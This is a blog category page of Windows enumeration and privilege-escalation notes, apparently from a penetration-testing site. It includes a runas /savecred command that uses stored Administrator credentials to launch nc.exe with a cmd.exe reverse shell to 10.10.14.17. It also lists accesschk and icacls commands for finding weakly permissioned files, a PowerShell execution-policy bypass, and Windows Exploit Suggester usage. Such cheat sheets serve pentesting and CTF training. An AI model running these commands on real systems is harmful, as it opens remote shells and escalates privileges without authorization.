Category: Category: Windows Enumeration
Common Windows Utilities
cmdkey /list
|
1 2 |
runas /savecred /user:DOMAIN\Administrator “cmd /k C:\Users\security\tmp\nc.exe -d 10.10.14.17 1233 -e cmd.exe “ |
accesschk – find writable dirs and files
|
1 2 |
accesschk32.exe -qwsu "username" C:\* /ACCEPTEULA |
Look for Weak folder and file permissions
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “Everyone” icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” icacls “C:\Program Files (x86)\*” 2>nul | findstr “(F)” | findstr “BUILTIN\Users” accesschk.exe -qwsu “Everyone” * accesschk.exe -qwsu “Authenticated Users” * accesschk64.exe -qwsu “Users” * |
[…]
Read More →Windows Enum
https://github.com/absolomb/WindowsEnum
|
1 2 |
powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1 extended |
Windows Exploit Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester.git Grab ”systeminfo” from windows box to file.
|
1 2 3 4 |
./windows-exploit-suggester.py –update ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt |
https://zero-day.io/windows-privilege-escalation-exploit-suggester/
Read More →